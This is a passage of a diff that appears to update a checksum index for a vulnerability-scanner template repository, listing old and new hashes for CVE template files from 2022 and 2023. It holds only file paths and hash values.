+http/cves/2022/CVE-2022-42233.yaml:61e0c2de52918b93544e1fe2601a4b6a6dd7379f http/cves/2022/CVE-2022-4260.yaml:99c2043ef60f9781825d9e38553528884a3947d9 -http/cves/2022/CVE-2022-42746.yaml:39e7aa8fa34a3f939e928ede4b1c1da61876709e -http/cves/2022/CVE-2022-42747.yaml:3d971abfd90e0d10fd58ead5efbd1aa3d8ca0bbb -http/cves/2022/CVE-2022-42748.yaml:204d5e5b9706d3d0cead75056f2395a192afbda8 -http/cves/2022/CVE-2022-42749.yaml:999708878e50d8a327ba5c64e19d32e4567976b2 -http/cves/2022/CVE-2022-4295.yaml:b4c8e7645a02fe4520b2070aee27aa0f9fe859ae +http/cves/2022/CVE-2022-42746.yaml:4b72e35a90e450430160f37def0dd7ab657f4a50 +http/cves/2022/CVE-2022-42747.yaml:474e69c648e82b2de88f69d7a4aee2c7bdb4b385 +http/cves/2022/CVE-2022-42748.yaml:f829de4a0f468181c0167e7339c51da7898d32f5 +http/cves/2022/CVE-2022-42749.yaml:144c6d12a52245f29f9b405ff7d147e613209012 +http/cves/2022/CVE-2022-4295.yaml:af2673758843078fc982b03d4cedecc7ec7ebf02 http/cves/2022/CVE-2022-4301.yaml:2b4e767bd84ebd4a1c84368b804c469efd73bad7 -http/cves/2022/CVE-2022-43014.yaml:b717c6dc89f6cea5a49cf29891f97f894e83dce6 -http/cves/2022/CVE-2022-43015.yaml:42428d1d954a72e78f1bde4cf3b7ce366c0d006e -http/cves/2022/CVE-2022-43016.yaml:fd40a5be7bad596c3ea4d7d688e0d0219ffbf06c -http/cves/2022/CVE-2022-43017.yaml:671cfb4ff9f6026c6f232721ca44fa6fb6177b11 -http/cves/2022/CVE-2022-43018.yaml:edc0bfd9d93a5ef12178593b5667000f2f4f4b75 -http/cves/2022/CVE-2022-4305.yaml:c2e7f7a25ad5f1d94314796e5519a2925c72421a +http/cves/2022/CVE-2022-43014.yaml:92ead82dd1d835d4389db7b4707f0b3e028d000b +http/cves/2022/CVE-2022-43015.yaml:45e467f955e57a2f18b6daa04ea0f7538ed519cb +http/cves/2022/CVE-2022-43016.yaml:f0b4aa5bda6ca15a0661f8704a6de6dfee5f0563 +http/cves/2022/CVE-2022-43017.yaml:0809d85d86abcc8a9ebe8239b814949b57a0f9ce +http/cves/2022/CVE-2022-43018.yaml:80fd0d27d0ba8be482f0f7dcf638bec40f23a143 +http/cves/2022/CVE-2022-4305.yaml:02092803b8dd031e9d95e8f1ffafc14d7bf5a0f9 http/cves/2022/CVE-2022-4306.yaml:4c3e9abf755bb6c3b6ed837fedbfef8364275064 http/cves/2022/CVE-2022-43140.yaml:0322a3a648b2a5c3e0d18c6a4cbf30ece99b5538 -http/cves/2022/CVE-2022-43164.yaml:0eeb5d90e92c716704d0cf6fda89f3c136f97f77 -http/cves/2022/CVE-2022-43165.yaml:c27cbc880505465a282e97f799b3c3e3aa360c66 -http/cves/2022/CVE-2022-43166.yaml:9dca1a380bb967e79637596b5e7ffca4141f0c03 -http/cves/2022/CVE-2022-43167.yaml:37e5c13a986b679e5abc2025aa7a568cbdca2b43 -http/cves/2022/CVE-2022-43169.yaml:a88416a3ff7f46d65cc1c2915c5ca7197d0da1de -http/cves/2022/CVE-2022-43170.yaml:a0473d9f31061020d822d2ce840a9874f5353c7e -http/cves/2022/CVE-2022-43185.yaml:0cbd64852901d1554d6da492ab83635216c3be07 +http/cves/2022/CVE-2022-43164.yaml:6e571b25f00a5d2733dde543bc5fedbac473ef85 +http/cves/2022/CVE-2022-43165.yaml:48ed74dc2820a0acc2c9c843e12951f436efb930 +http/cves/2022/CVE-2022-43166.yaml:1ddb937c39b89935f553e2c7acf87886a93bd255 +http/cves/2022/CVE-2022-43167.yaml:709218d04d13e0c07abf4bcd18540b019490777d +http/cves/2022/CVE-2022-43169.yaml:eb77c12bb71d945796881f636ba7a2e3c08f2b85 +http/cves/2022/CVE-2022-43170.yaml:691bed0d3a09bf0c16221296c7b23f38bc754644 +http/cves/2022/CVE-2022-43185.yaml:b57fd260fc55624d9f07644e75bc4764b0eb7551 http/cves/2022/CVE-2022-4320.yaml:85df1be119e20f7dd54ec90fe4f29813ec89fc90 -http/cves/2022/CVE-2022-4321.yaml:18451ef7ed2083de058c2fc773cd4c0df5a2b383 +http/cves/2022/CVE-2022-4321.yaml:bd5a8d0548cb324121d5783c7219b93125284470 http/cves/2022/CVE-2022-4325.yaml:f186020c216cd067428f78142dc9637ac51c3ec8 http/cves/2022/CVE-2022-4328.yaml:027d49a96bd49b38b06c63fe56e85df269c0af27 -http/cves/2022/CVE-2022-43769.yaml:c486a19621f831f2ff911d73ccaabea6d3cd160c -http/cves/2022/CVE-2022-44290.yaml:c603b4cdf73c9b70df220546fb645d454fbfd368 +http/cves/2022/CVE-2022-43769.yaml:b733fb9cb4552a09ee498322b084a9016c5dcc3e +http/cves/2022/CVE-2022-44290.yaml:85e3503abca97f455a3945186bd594989b40f683 http/cves/2022/CVE-2022-44291.yaml:50e4b9fef3f63a6f1166f23761c05ecea1412bbb -http/cves/2022/CVE-2022-4447.yaml:c9d25f4aa9bb183e694aeaf192aef082aaa8488d -http/cves/2022/CVE-2022-44877.yaml:be98d94de3e1c31bbbb39d3dc0247edc977dfa54 -http/cves/2022/CVE-2022-44944.yaml:f00ef3969d0664b71b4715b19517ecc98ebc6df8 -http/cves/2022/CVE-2022-44946.yaml:453855c9f2f7075b8adccf44ddc480503ebf4971 -http/cves/2022/CVE-2022-44947.yaml:2c4f375aa7b145b79779717810691f9a4f126132 -http/cves/2022/CVE-2022-44948.yaml:dbf5eeb8fd9e92ebb10c6a890a91d6f843d1dc45 -http/cves/2022/CVE-2022-44949.yaml:8a5933d5146e24635a69f07aca8987dbbf68b04d -http/cves/2022/CVE-2022-44950.yaml:c571eaeef5ec8b3f8848105ceefac4a3830701d9 -http/cves/2022/CVE-2022-44951.yaml:6be098f9e329d31cf0253e8216a793308f88e071 -http/cves/2022/CVE-2022-44952.yaml:3f46d24b1722b64d2b4bc818c7163d01c75a04eb -http/cves/2022/CVE-2022-44957.yaml:76e30de6a140d013610148fdd8861f9b550f9798 +http/cves/2022/CVE-2022-4447.yaml:7b522773f561dcadf6cd9b1dd35626a617a44540 +http/cves/2022/CVE-2022-44877.yaml:900c88227650681436c4ea0e18edad8d660151cc +http/cves/2022/CVE-2022-44944.yaml:a962e361882b8646c2abe7a35aa1011377621b03 +http/cves/2022/CVE-2022-44946.yaml:70cf0be765fbcc0e578592e3ef1327a687236b97 +http/cves/2022/CVE-2022-44947.yaml:690c57490665a5ac71b5e986528f397be7ee3b54 +http/cves/2022/CVE-2022-44948.yaml:529bca0e58da0c48d94378ba0df6c1a29c1266fd +http/cves/2022/CVE-2022-44949.yaml:4efaa78026de42d42471443f6facf77f2b26461a +http/cves/2022/CVE-2022-44950.yaml:dcb79e25f51207c058eebc32b5dc3759057b4aa1 +http/cves/2022/CVE-2022-44951.yaml:fb0c02fa48b944a989db7f1c6047ea4c219d3f6a +http/cves/2022/CVE-2022-44952.yaml:98f0f39417d1b1da4eacbb2c5701080a02e2e667 +http/cves/2022/CVE-2022-44957.yaml:e98e24b7a0627993b880bd607cbcba1114541eac http/cves/2022/CVE-2022-45037.yaml:6abb4c091e036c9d52b7c996e0c26d9531ba8f4a http/cves/2022/CVE-2022-45038.yaml:d2503018ebb3d9883bc8ed21f43e67f15422aae5 -http/cves/2022/CVE-2022-45354.yaml:9d95874638df035ad77e155bd640eeb01cb7d91b +http/cves/2022/CVE-2022-45354.yaml:a793eb9083095fe06eabeb4851a9762165207fa7 http/cves/2022/CVE-2022-45362.yaml:ade84fe7804fdef6dfb1718899ac3b1917cfc679 -http/cves/2022/CVE-2022-45365.yaml:a2bff61ddc56ec7cbd7390ba7d9658a631e6f54b -http/cves/2022/CVE-2022-45805.yaml:b14ab31f7ff7c98eb1ed4673974e7f4f53145339 +http/cves/2022/CVE-2022-45365.yaml:adb2db65b0a25e12e6b7869f9b9f64468ae1c418 +http/cves/2022/CVE-2022-45805.yaml:d7f59367ab58445983ca8a77f4d3fe4891bc3001 http/cves/2022/CVE-2022-45835.yaml:420e435b203f5340bdfc7e43ec9407d779f6d22d -http/cves/2022/CVE-2022-45917.yaml:741d68de2543d4c01ff6f886e16c9f8788766249 -http/cves/2022/CVE-2022-45933.yaml:f7d29b87970a8dfa90acb24ed02c3f1f6f8f58d0 -http/cves/2022/CVE-2022-46020.yaml:e0552e13db975cee4bcedc8e28ac1234e9c729b4 +http/cves/2022/CVE-2022-45917.yaml:2fdc22fa1a2c734635c1c64eda7872b2cd177ef1 +http/cves/2022/CVE-2022-45933.yaml:ed37fe6a11c49820db8c60c4858b4c7530df3f70 +http/cves/2022/CVE-2022-46020.yaml:8b2716bf9ae7bcbe03eac7c284ed88d82724cb88 http/cves/2022/CVE-2022-46071.yaml:925a37f307139ce11d93e0485f15d63771038b5f -http/cves/2022/CVE-2022-46073.yaml:4abf54b46d841380d49cf0dbe92ff63e82219e6d -http/cves/2022/CVE-2022-46169.yaml:3755ce6b6da8f3d360449098ae9fc62414c64143 -http/cves/2022/CVE-2022-46381.yaml:91446b2ef8fc216a60a868567d0b243977e79f67 +http/cves/2022/CVE-2022-46073.yaml:e7788e3f94e13fe703a8986a0608358e63657e32 +http/cves/2022/CVE-2022-46169.yaml:81acad5716018e4e2a395e47799c06747cbd42a7 +http/cves/2022/CVE-2022-46381.yaml:3bd8005ec273ce7e2976ae861d775386ee10a524 http/cves/2022/CVE-2022-46443.yaml:2de7041c6bb180c94f963123ffc022ecff0d8fc2 -http/cves/2022/CVE-2022-46463.yaml:86c8f65c4be20f464ee7022c7c95cc2d9caf0751 -http/cves/2022/CVE-2022-46888.yaml:f3c127c392bebf667a0e2548bff6c07728d4bd15 -http/cves/2022/CVE-2022-46934.yaml:36603ffeb2c7ec189e9e095894f7b3f00ec93eae -http/cves/2022/CVE-2022-47002.yaml:c7119d413f860f3640566b7045168033f0f8429b +http/cves/2022/CVE-2022-46463.yaml:efbe531c6b022d95ed26274581a5af5183216c53 +http/cves/2022/CVE-2022-46888.yaml:579e14aca37b57dcbf0b41dc9a2271383cd8e2f7 +http/cves/2022/CVE-2022-46934.yaml:02b9ddba75c7a36babdf1cde4d09e16f8e23f501 +http/cves/2022/CVE-2022-47002.yaml:6a2216c6a6714111925f8a82ecf0c9fa5bf5bee5 http/cves/2022/CVE-2022-47003.yaml:39b0dcdde25452144702c74bddbf9842ef9c2feb -http/cves/2022/CVE-2022-47075.yaml:3c5d5ac26ca7832305fc38a485dac1ba889a89e6 +http/cves/2022/CVE-2022-47075.yaml:d80b880397e3696776237e92a487935e67cf886d http/cves/2022/CVE-2022-47501.yaml:5a057cde27d1558e1cf82a1363829f1b07e1e7d0 -http/cves/2022/CVE-2022-47615.yaml:224fb7cd2afdb780ae587265986e8e69485ab93a -http/cves/2022/CVE-2022-47945.yaml:214f7f475ad7af118250412d62480559b091de4e -http/cves/2022/CVE-2022-47966.yaml:3c3fff95441b9c262454fed854893705c6c81c6a -http/cves/2022/CVE-2022-47986.yaml:10039251a5256fba4e074f8ab929fff4d2698181 -http/cves/2022/CVE-2022-48012.yaml:a314bcd807127751eafd5704712ad817119d1e5d -http/cves/2022/CVE-2022-48165.yaml:2924708e53089f3448ccb9e4456eab50a255e475 -http/cves/2022/CVE-2022-48197.yaml:3637340a7a0a61a3a666170aa7c61cfba8420427 -http/cves/2022/CVE-2022-4897.yaml:69298dfcb359adcc00a49f5df06cd3ced0c5bd9f -http/cves/2023/CVE-2023-0099.yaml:9407e1c3bced15c82b969d23516fd90490c1aee1 -http/cves/2023/CVE-2023-0126.yaml:c9dec5f824c521f0333efd2134fce5831ff3b45b -http/cves/2023/CVE-2023-0159.yaml:623f9ab092c9590e7d9b3e245fe2f8b090df54f5 -http/cves/2023/CVE-2023-0236.yaml:380e957dae0bdeecfd2341e55c5dd820ce6d3e60 +http/cves/2022/CVE-2022-47615.yaml:bbe2e07ae5dbd832c2cc65b2f7ca36c030f52b33 +http/cves/2022/CVE-2022-47945.yaml:97169532b2b8b7571b95916c57424e72d7065998 +http/cves/2022/CVE-2022-47966.yaml:af1bb2fa2710b224c472e2a1b5af3838962c2728 +http/cves/2022/CVE-2022-47986.yaml:8ed22d99ee409641cd4ad6ac5f9c82611f723b00 +http/cves/2022/CVE-2022-48012.yaml:8ad3d951e84b4e917c805d17a978e04c6bd31cf8 +http/cves/2022/CVE-2022-48165.yaml:5b832f9fb849f7aadcb963a5c2fa8c87bf309497 +http/cves/2022/CVE-2022-48197.yaml:5698e9353865370a7b92e512b093b974453ff937 +http/cves/2022/CVE-2022-4897.yaml:53f0aba534dc50ab3f73fe45b077340a0f6f791b +http/cves/2023/CVE-2023-0099.yaml:e09f47a4940ff99c8bd70fe410b21e86584deaa7 +http/cves/2023/CVE-2023-0126.yaml:a54e76067a42d920676305e72882b5cb8d6db686 +http/cves/2023/CVE-2023-0159.yaml:06dfde67e7960bf7adf9597508141fdfac598393 +http/cves/2023/CVE-2023-0236.yaml:5fbf81b6152e933910d34f140cede20a70339f8c http/cves/2023/CVE-2023-0261.yaml:5087fa9d04efc600b41de02fcac82bda2bcf0595 -http/cves/2023/CVE-2023-0297.yaml:73ec3fd3ef519a4e10a5f0a6183e7fa44e032417 -http/cves/2023/CVE-2023-0334.yaml:20fe2a5a77dab3ff57b3fda74306c9653b1e1714 -http/cves/2023/CVE-2023-0448.yaml:eda3389c65a3febc26ecb5aab7b333cc7cd8752b -http/cves/2023/CVE-2023-0514.yaml:b190f731d39ae6bd7dd1fcc1614d4fc5ddd7a67a -http/cves/2023/CVE-2023-0527.yaml:449eebba4ffb759da9b3d3781d8265572e4872b9 -http/cves/2023/CVE-2023-0552.yaml:067807d345cdd332f78da62e988b12c17cda2ad2 -http/cves/2023/CVE-2023-0562.yaml:d7332a44f3d6f98ffc1b4b5975e4c09996456df8 +http/cves/2023/CVE-2023-0297.yaml:e7baf32f9942f688924d9a162dc7551de98dde89 +http/cves/2023/CVE-2023-0334.yaml:adafbaa999b2d81291647630f256534cf89e1964 +http/cves/2023/CVE-2023-0448.yaml:b1ef2c2f82671bf7768df19ac61414b49a800956 +http/cves/2023/CVE-2023-0514.yaml:cddeb96f132ed763163b122c5fd44456704ddf57 +http/cves/2023/CVE-2023-0527.yaml:0e9801c97087f3aa24b6257d56e6772b0e693c59 +http/cves/2023/CVE-2023-0552.yaml:0760deedf488e135c767704cd7e9ba47452832b5 +http/cves/2023/CVE-2023-0562.yaml:dedbac0108d92c16a716dfee990455027942e09f http/cves/2023/CVE-2023-0563.yaml:5826a789671414b74d945727d46e2868a0030eb9 -http/cves/2023/CVE-2023-0600.yaml:8ced611a1b904aa3fa713f0cf86b98333a9eee27 -http/cves/2023/CVE-2023-0602.yaml:963da93d44e1d420917e29807ab00d24da7f4a2a -http/cves/2023/CVE-2023-0630.yaml:76c40dee85cef62fea4bdbd5aac6615d56560379 -http/cves/2023/CVE-2023-0669.yaml:ee0e8d205aa9a8b41f3bbdb15c3080b58b78c1c5 -http/cves/2023/CVE-2023-0678.yaml:385c4eab403646be9bad42eb8a53d618f7c3b918 +http/cves/2023/CVE-2023-0600.yaml:09edb6a74e6c8b298542d990288279230e8755b8 +http/cves/2023/CVE-2023-0602.yaml:ff8508c23cf1205eacdf532b97243ed38c44192a +http/cves/2023/CVE-2023-0630.yaml:79c8dee6873225aaf9f80e29a2fe2ecd54b0cadc +http/cves/2023/CVE-2023-0669.yaml:6d285a26e93cfa32c6caa2c5836644273e50c8a6 +http/cves/2023/CVE-2023-0678.yaml:63b5b4ff9f86d447ef93ab3ef1459090de165b88 http/cves/2023/CVE-2023-0777.yaml:695dc3b34a41b2d46cabcb2c40a57b3fe284f036 -http/cves/2023/CVE-2023-0900.yaml:963be1ca8c5c3c2dabcf49c2f73a408a6c955c65 -http/cves/2023/CVE-2023-0942.yaml:79476071a557960f5884cdc592f8097574a6cf32 -http/cves/2023/CVE-2023-0947.yaml:da5f95caaa440787ccef2a601ba556668f24a959 -http/cves/2023/CVE-2023-0948.yaml:0e14d3c045afd9efb862ea0e614c73252ac4514c -http/cves/2023/CVE-2023-0968.yaml:f8e5b8ef259c139f4b482ba552268478f1da2cfb -http/cves/2023/CVE-2023-1020.yaml:b69666a2d79336b9770a923b39506a57d4b65265 -http/cves/2023/CVE-2023-1080.yaml:06a280b40e10d84f65e9d4fe0373160af43b23e5 -http/cves/2023/CVE-2023-1177.yaml:0597fd3928a78cb715bd3c5af3d98538afd0eb7e -http/cves/2023/CVE-2023-1263.yaml:18b8bfae0bd9aeea4569dc38e4580fb43fb0192a -http/cves/2023/CVE-2023-1362.yaml:807258298246ea1a9d3072d632645c1961eb6e92 -http/cves/2023/CVE-2023-1408.yaml:4ef772b4bbe713ec3b916a0cda682ea057272a1f +http/cves/2023/CVE-2023-0900.yaml:b759bab8d921f6f87047fe65b1a8270a25ac6c78 +http/cves/2023/CVE-2023-0942.yaml:727aa39921928b56f641bda22efa7bc0ceaa8b2a +http/cves/2023/CVE-2023-0947.yaml:99ec36b3fb58ac77cdb7da8e784120ca7d58bd3b +http/cves/2023/CVE-2023-0948.yaml:0367e3cf81b12e51330d0b1ab2d09761172a554d +http/cves/2023/CVE-2023-0968.yaml:ae1e19b9b10293fe400ba1410af6e61fe97fcb12 +http/cves/2023/CVE-2023-1020.yaml:5636fe07aa03fa9f3a0b33826c8f8f7a690f7925 +http/cves/2023/CVE-2023-1080.yaml:bcb835fba141a11986b02014068b75190537899c +http/cves/2023/CVE-2023-1177.yaml:f14c03311e38c1d9faebb9a86ee2723b3f417f87 +http/cves/2023/CVE-2023-1263.yaml:04b6a372edaa449d9f7d09dde92c7f53f70718e8 +http/cves/2023/CVE-2023-1362.yaml:cdee456e5b9cf88406cf478d4f9c519dc7ba89df +http/cves/2023/CVE-2023-1408.yaml:dc5282fda3dc97da2b9c2be50065535af09f6fc9 http/cves/2023/CVE-2023-1434.yaml:35cc7af9bfe87b4a88a973a22dae4cc94a23bd97 -http/cves/2023/CVE-2023-1454.yaml:43a3f533086bffd26a98f2d1fcf1904c34aca555 -http/cves/2023/CVE-2023-1496.yaml:9ccfb9de2723eeaf44995da93812f3c2b4a8befc -http/cves/2023/CVE-2023-1546.yaml:2a08741443b59c4a5fdbe02e4c0028b8c41a67e6 -http/cves/2023/CVE-2023-1671.yaml:73fd6161f1fcfe63a9a11493372a8ccef8c1d8cd -http/cves/2023/CVE-2023-1698.yaml:4ab257d35df1ae3ff59be5ff99a1fe141bd8da13 -http/cves/2023/CVE-2023-1719.yaml:683e6cc34d42a2d662085b33199a40b444736fb6 -http/cves/2023/CVE-2023-1730.yaml:918e7befadba4f7c4b12f0b3c959f704e9571f2b -http/cves/2023/CVE-2023-1780.yaml:34a036d95931c6b53e0cdbbe5524814efebac2c9 -http/cves/2023/CVE-2023-1835.yaml:0a952460cce5463c54ae68fca72f4c1bec74ec54 -http/cves/2023/CVE-2023-1880.yaml:254a4b78665d1b33b264997a8b496cb33fcc376e -http/cves/2023/CVE-2023-1890.yaml:36d627ec07a4728f8df5debe01f9dcefe52c90cf -http/cves/2023/CVE-2023-1892.yaml:cf100b4cee239124a45c620eabe4e227c72cd62b -http/cves/2023/CVE-2023-20073.yaml:2f3e6872656d3f4428b063cf071c2b2490a0d0dd -http/cves/2023/CVE-2023-2009.yaml:bb71de754a3ece32e5eca69ecd358e30f88f742b +http/cves/2023/CVE-2023-1454.yaml:f507915aeffd9373633f9903f3f42fd148ae631f +http/cves/2023/CVE-2023-1496.yaml:07cd1dcd0767b93ad10044260e11e4cbb12875ac +http/cves/2023/CVE-2023-1546.yaml:e1ce7e4455e8d70f81d039868cfa7c05e9b7950c +http/cves/2023/CVE-2023-1671.yaml:681f98443bbfc4892fc531bf522cf922ba80f813 +http/cves/2023/CVE-2023-1698.yaml:e945233b316cdedba4ca8e9d7b5fc33755f55d26 +http/cves/2023/CVE-2023-1719.yaml:7837cfc713541d4998a43dd94e445eedf1583e70 +http/cves/2023/CVE-2023-1730.yaml:0ac62ee0d8e280f74152e8189f92a7dcbd1a0d04 +http/cves/2023/CVE-2023-1780.yaml:a13c9a4883fbae14fc1fdfaffb1e1b0d942a6338 +http/cves/2023/CVE-2023-1835.yaml:10fd479ca3a5aa355acbca9f948ac5cfc84174b3 +http/cves/2023/CVE-2023-1880.yaml:6d83ee09fbe4910f81808b87ef627188221ff428 +http/cves/2023/CVE-2023-1890.yaml:8cbb29b8a367580d3c3df12f01b6f44096964487 +http/cves/2023/CVE-2023-1892.yaml:b427a93cbc382d7f03e99c1a52d0179c76b83cc2 +http/cves/2023/CVE-2023-20073.yaml:32602a37f6dedce15b6c14cfc174e3ab4a412b75 +http/cves/2023/CVE-2023-2009.yaml:0e458c2616c9e35744adb4e65737b8801f074695 http/cves/2023/CVE-2023-20198.yaml:a51d3f58209d7ee5a28087839f7bfe0ba70173c7 -http/cves/2023/CVE-2023-2023.yaml:521a587d1d6ebb7014e0800bf4f7a89a66e4bff5 -http/cves/2023/CVE-2023-2059.yaml:856fa67098cc6c0abe1bb0921e4dd4205bd017ee -http/cves/2023/CVE-2023-20864.yaml:39eebb5c215549237a86a0446e07210bc37b47d4 -http/cves/2023/CVE-2023-20887.yaml:ed50cf91b29dcdf6a78a4e524805ac4758ea41da -http/cves/2023/CVE-2023-20888.yaml:99b2bd7f57dedcd0a4fa003660be6817b734806f -http/cves/2023/CVE-2023-20889.yaml:08dffb50523b65314d66f11933aef18c2ae84066 -http/cves/2023/CVE-2023-2122.yaml:702367e6b6407a7d3ec8ddc7d1dc884bc622b8ad -http/cves/2023/CVE-2023-2130.yaml:3112dc19046f9cd9a37c8248f8dd4993a2785ea3 -http/cves/2023/CVE-2023-2178.yaml:1c0e5bdc28786bbf38e0dab3801f5ed0f7d57d80 -http/cves/2023/CVE-2023-22232.yaml:7a054b7c8eb7e2a0e5ea214bddba72a25b1812d6 -http/cves/2023/CVE-2023-2224.yaml:52adda04d740bd4bfdce198531080707a6914193 -http/cves/2023/CVE-2023-2227.yaml:54472ac0d1a72b07f2b8a497807a39cc85882372 -http/cves/2023/CVE-2023-22432.yaml:d50bb3793ea5aa8783f5fb80f2f8b341f44818b5 -http/cves/2023/CVE-2023-22463.yaml:211e5de7967e175e73daf8d08a733140f2488fed -http/cves/2023/CVE-2023-22478.yaml:a65b40c02a4506378bee485814f98c19b9ac1aa0 -http/cves/2023/CVE-2023-22480.yaml:5ec18234f5902740cd4c86a7f84a0e2d818b3238 -http/cves/2023/CVE-2023-22515.yaml:f94884e3194ae500480a750b04d0b5dbd958a72a -http/cves/2023/CVE-2023-22518.yaml:6238cdc95cb3717cfe137f219d12d6aa519a65cb -http/cves/2023/CVE-2023-2252.yaml:346166bd1121ed3848590e230197337add10baa3 -http/cves/2023/CVE-2023-22527.yaml:1d8437eb27cd2d5c3181f95a995500594155d36e -http/cves/2023/CVE-2023-22620.yaml:8684a2d7d57ec48828f6ef1531618c0ecb1da71f -http/cves/2023/CVE-2023-2272.yaml:9f036b4cefc719e329ca758c4e02905be7724bf2 -http/cves/2023/CVE-2023-22897.yaml:4389ebea96863e9755b765b82017e6d1bcdc4048 -http/cves/2023/CVE-2023-23161.yaml:4b0df851a5fccd63d08afa7aeff5ae4c8f0bd959 -http/cves/2023/CVE-2023-23333.yaml:ae5a7d1531b286d05d7daf5ae153686fef008f11 -http/cves/2023/CVE-2023-23488.yaml:e05ba2c9b2516c0cf2aca3095f8b0b3b17310941 -http/cves/2023/CVE-2023-23489.yaml:172b8a24c13a4a26a74102aa2a9422af872c837b -http/cves/2023/CVE-2023-23491.yaml:d4f0791828d94fe9af0974e9f408e12b276fecfd -http/cves/2023/CVE-2023-23492.yaml:e838305b5a0f367b3cc188f50edd708e12348e07 -http/cves/2023/CVE-2023-2356.yaml:56e18eafd05c1339a6cbdccc1a5e6937f7c4360c -http/cves/2023/CVE-2023-23752.yaml:125afb31775db2a9e83f2afe9e458a14fd110640 -http/cves/2023/CVE-2023-24044.yaml:ebaa1b4198d9540ac648e0a736095bf0468f5555 -http/cves/2023/CVE-2023-24243.yaml:bd6a21d166eeeaf0220de4b6f901b1eaaec3c935 -http/cves/2023/CVE-2023-24278.yaml:3f1219d513ec4b0aae780f1a9fbc67fece5b87a2 -http/cves/2023/CVE-2023-24322.yaml:c4b5cc0d4d70fa16682f706a954b95c84e0e7896 +http/cves/2023/CVE-2023-2023.yaml:6711a89e6918606b2dd7d47c76153e28261094b0 +http/cves/2023/CVE-2023-2059.yaml:d90234f615f76231d2e24221befc70aed4a1a8c9 +http/cves/2023/CVE-2023-20864.yaml:22050ddba9d20317baad72a08ded7974446dea6e +http/cves/2023/CVE-2023-20887.yaml:b1b143618d3396f595f72022fa53239a8b069a5e +http/cves/2023/CVE-2023-20888.yaml:efa8475387c2ab727684b086e65cb5d292a2a73a +http/cves/2023/CVE-2023-20889.yaml:16a60a2c49b7b52e149c9a108e3ed9d814607501 +http/cves/2023/CVE-2023-2122.yaml:46ca5a614d4044ae9ef00b08846d515fc92af1a6 +http/cves/2023/CVE-2023-2130.yaml:09284dfc7455d0803979c640213c48b540b0320a +http/cves/2023/CVE-2023-2178.yaml:9d030e9e9e685cff2820ffcda48385c1f1c3ed02 +http/cves/2023/CVE-2023-22232.yaml:405eae8487cd087f14eb89f375ee2ad4fdb39fef +http/cves/2023/CVE-2023-2224.yaml:ccf9b19f8648317b36a26d95da4e7ff5eaa2a076 +http/cves/2023/CVE-2023-2227.yaml:a543fd2374500619eabd60a33e9c3505301f3e9c +http/cves/2023/CVE-2023-22432.yaml:24909cb5a915d9380fa96d050b24d80d1a6f7348 +http/cves/2023/CVE-2023-22463.yaml:cc556e03212aad829d648982872bc5faf1736d6e +http/cves/2023/CVE-2023-22478.yaml:ef6e66eb6d47a4d69eaf216b2c1efd78ce62c36d +http/cves/2023/CVE-2023-22480.yaml:73ce7854345335bda42d333c7c0ff06814ff0aed +http/cves/2023/CVE-2023-22515.yaml:739c18a0ae5877afcec00abdb56fe6903cac125e +http/cves/2023/CVE-2023-22518.yaml:43089328e1ed1386683d74f8483b06a55767f8cd +http/cves/2023/CVE-2023-2252.yaml:6bdd5a55d3be400de7f3aa5b04a1e0cde7fc1d3e +http/cves/2023/CVE-2023-22527.yaml:c53d2a4bba640a999631b07b9cea85b371f4cb45 +http/cves/2023/CVE-2023-22620.yaml:b41d8e2aca1d8f11f7ef58bddaab7c900ef27175 +http/cves/2023/CVE-2023-2272.yaml:75fb822252ec07ce5f8c8234d5c99dbc214a5a8a +http/cves/2023/CVE-2023-22897.yaml:1dc50bc03e62695bf9930998ac50d1e8532031ca +http/cves/2023/CVE-2023-23161.yaml:330962071a2da439c6f4ad2cfd9399673b3c3748 +http/cves/2023/CVE-2023-23333.yaml:c82c96716e574b2ac6f5243a42561e6b661697d7 +http/cves/2023/CVE-2023-23488.yaml:cce2f22d82bdbb32512be4899c8956b8a98469b3 +http/cves/2023/CVE-2023-23489.yaml:e2f4be81d387be5eb2856fe6218282fee51428fb +http/cves/2023/CVE-2023-23491.yaml:7432abe66255565410e775aed3599fe72f64babf +http/cves/2023/CVE-2023-23492.yaml:9412ada1002d29956c069b2d1ed3fa39ebf9d4ca +http/cves/2023/CVE-2023-2356.yaml:afcfcb280eaa73e7841563176920159586de1c48 +http/cves/2023/CVE-2023-23752.yaml:855cd21aad48643be8adce80ee4a57b3cfaeb3e3 +http/cves/2023/CVE-2023-24044.yaml:b1fcbf242f8611b3d7429bbc30319b6a1cfded2e +http/cves/2023/CVE-2023-24243.yaml:5d77029d1e00451d81039ca3c90ea6df376e07b5 +http/cves/2023/CVE-2023-24278.yaml:1923ae74c574d89888f1c0724a3c6a58afe4d460 +http/cves/2023/CVE-2023-24322.yaml:08bc0c874464a6fc3abc02de139fe9083c41b221 http/cves/2023/CVE-2023-24367.yaml:dab63258fffca6b44d754ede551d56eea925a477 -http/cves/2023/CVE-2023-24488.yaml:8a381e70fd0643ed5d1371edb70b40e25e9b5ff8 -http/cves/2023/CVE-2023-24489.yaml:9db6384fde838fafdb4d669784540c03f03b427b -http/cves/2023/CVE-2023-24657.yaml:1efdbfecef2aacf600fb007989d4efc6aa9d7fbe -http/cves/2023/CVE-2023-24733.yaml:8c12c7187efcc4652bb7bf6bb0069cbe8762fc0d -http/cves/2023/CVE-2023-24735.yaml:35b457aeb699de6d59519aff249be662b70d4a37 -http/cves/2023/CVE-2023-24737.yaml:facc801d9eca13c7392c35caa520fb642f0c5971 -http/cves/2023/CVE-2023-2479.yaml:e380c2326f30db012e6a091a9a20bd2c9c56b0cd -http/cves/2023/CVE-2023-25135.yaml:8a3b6d23aac32527511e347c7212b8f8a227117b -http/cves/2023/CVE-2023-25157.yaml:a47b8df2e4f9871518e24d36431cc36466e35e36 -http/cves/2023/CVE-2023-25194.yaml:754c9c257413b4590237bd3a90e17393dace3436 -http/cves/2023/CVE-2023-25346.yaml:fca6cb7b61b9f36d5aaed4cc545a276e354c490d -http/cves/2023/CVE-2023-25573.yaml:c3d23d32db9e6ef1d891d06c6e28d48a684b1504 -http/cves/2023/CVE-2023-25717.yaml:0b6c0a8588e86f9213e2e17a2c043374955aba8c -http/cves/2023/CVE-2023-26035.yaml:0be0bf85dd852a1a7beed98f5fdc58ea4820e04c +http/cves/2023/CVE-2023-24488.yaml:d0fb3f9b0de2a277171ee4a98c8bd44aad7d2088 +http/cves/2023/CVE-2023-24489.yaml:88f26dd03607c7a69552055427bc8f70163d01c7 +http/cves/2023/CVE-2023-24657.yaml:748b677675913cd96bb56e2d9f537380735d2312 +http/cves/2023/CVE-2023-24733.yaml:c8b0d43ceccc3991aaa817097347478eafe24452 